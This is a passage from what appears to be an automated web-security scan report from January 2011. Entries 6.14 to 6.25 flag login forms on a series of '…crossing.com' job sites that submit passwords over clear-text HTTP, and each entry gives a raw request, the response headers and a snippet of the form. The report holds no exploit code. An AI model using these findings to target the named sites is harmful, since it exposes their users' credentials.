                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.14. http://www.bilingualcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bilingualcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.bilingualcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:03 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=3jv1797bk3m69qp27lbh4qrqj2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:03 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:03 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:03 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:03 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:03 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:03 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:03 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:03 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 133153

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.bilingualcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.15. http://www.biotechcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.biotechcrossing.com
Path:   /

Issue detail

The page contains a form with the action URL http://www.biotechcrossing.com/index.php, which is submitted over clear-text HTTP. The form contains the password field clslogin_password.

Request

GET / HTTP/1.1
Host: www.biotechcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:05 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=u6vsjargff90aq2r4fvrep9g90; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:05 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:05 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:05 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:05 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:05 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:05 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:05 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:05 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 119741

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.biotechcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.16. http://www.bluecollarcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bluecollarcrossing.com
Path:   /

Issue detail

The page contains a form with the action URL http://www.bluecollarcrossing.com/index.php, which is submitted over clear-text HTTP. The form contains the password field clslogin_password.

Request

GET / HTTP/1.1
Host: www.bluecollarcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:36 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=phn4e0vehg11att6t127knugu0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:36 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:36 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:36 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:36 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:36 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:36 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:36 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:36 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 149168

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.bluecollarcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.17. http://www.businessanalystcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.businessanalystcrossing.com
Path:   /

Issue detail

The page contains a form with the action URL http://www.businessanalystcrossing.com/index.php, which is submitted over clear-text HTTP. The form contains the password field clslogin_password.

Request

GET / HTTP/1.1
Host: www.businessanalystcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:41 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=kldqa0cqamr0mp6anoh752e7o2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:41 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 124047

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.businessanalystcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.18. http://www.businessdevelopmentcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.businessdevelopmentcrossing.com
Path:   /

Issue detail

The page contains a form with the action URL http://www.businessdevelopmentcrossing.com/index.php, which is submitted over clear-text HTTP. The form contains the password field clslogin_password.

Request

GET / HTTP/1.1
Host: www.businessdevelopmentcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:41 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ru1216s8gi6hento64jtdlqce3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:41 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 116452

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.businessdevelopmentcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.19. http://www.callcentercrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.callcentercrossing.com
Path:   /

Issue detail

The page contains a form with the action URL http://www.callcentercrossing.com/index.php, which is submitted over clear-text HTTP. The form contains the password field clslogin_password.

Request

GET / HTTP/1.1
Host: www.callcentercrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:44 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=prr05v672vhpd9l46bt5lu88r3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:44 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:44 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:44 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:44 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:44 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:44 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:44 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:44 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 128551

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.callcentercrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.20. http://www.chefcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.chefcrossing.com
Path:   /

Issue detail

The page contains a form with the action URL http://www.chefcrossing.com/index.php, which is submitted over clear-text HTTP. The form contains the password field clslogin_password.

Request

GET / HTTP/1.1
Host: www.chefcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:46 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ha4et9frtsniged97g2n86qvf0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:46 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:46 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:46 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:46 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:46 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:46 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:46 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:46 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 108888

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.chefcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.21. http://www.civilengineeringcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.civilengineeringcrossing.com
Path:   /

Issue detail

The page contains a form with the action URL http://www.civilengineeringcrossing.com/index.php, which is submitted over clear-text HTTP. The form contains the password field clslogin_password.

Request

GET / HTTP/1.1
Host: www.civilengineeringcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:59 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=soga8db6spril7hls6mrahaid5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:59 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:59 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:59 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:59 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:59 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:59 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:59 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:59 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 106801

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.civilengineeringcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.22. http://www.clevelcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.clevelcrossing.com
Path:   /

Issue detail

The page contains a form with the action URL http://www.clevelcrossing.com/index.php, which is submitted over clear-text HTTP. The form contains the password field clslogin_password.

Request

GET / HTTP/1.1
Host: www.clevelcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:10 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=7grpnh4ane7h6vq7m94a09osd0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:10 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:10 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:10 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:10 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:10 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:10 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:10 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:10 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 115509

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.clevelcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.23. http://www.clinicalresearchcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.clinicalresearchcrossing.com
Path:   /

Issue detail

The page contains a form with the action URL http://www.clinicalresearchcrossing.com/index.php, which is submitted over clear-text HTTP. The form contains the password field clslogin_password.

Request

GET / HTTP/1.1
Host: www.clinicalresearchcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:18 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=pot86ho5ls3u8ap2dd0c7javd7; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:18 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:18 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:18 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:18 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:18 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:18 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:18 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:18 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 101472

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.clinicalresearchcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.24. http://www.compliancecrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.compliancecrossing.com
Path:   /

Issue detail

The page contains a form with the action URL http://www.compliancecrossing.com/index.php, which is submitted over clear-text HTTP. The form contains the password field clslogin_password.

Request

GET / HTTP/1.1
Host: www.compliancecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:20 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=t20irb9usa5ru4jlcuufdl43b5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:20 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:20 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:20 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:20 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:20 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:20 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:20 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:20 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 135192

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.compliancecrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.25. http://www.computeraideddesigncrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.computeraideddesigncrossing.com
Path:   /

Issue detail

The page contains a form with the action URL http://www.computeraideddesigncrossing.com/index.php, which is submitted over clear-text HTTP. The form contains the password field clslogin_password.

Request

GET / HTTP/1.1
Host: www.computeraideddesigncrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:21 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=i4i09jl3sjo0digpp5qe6oqa75; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:21 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:21 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:21 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:21 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:21 GMT
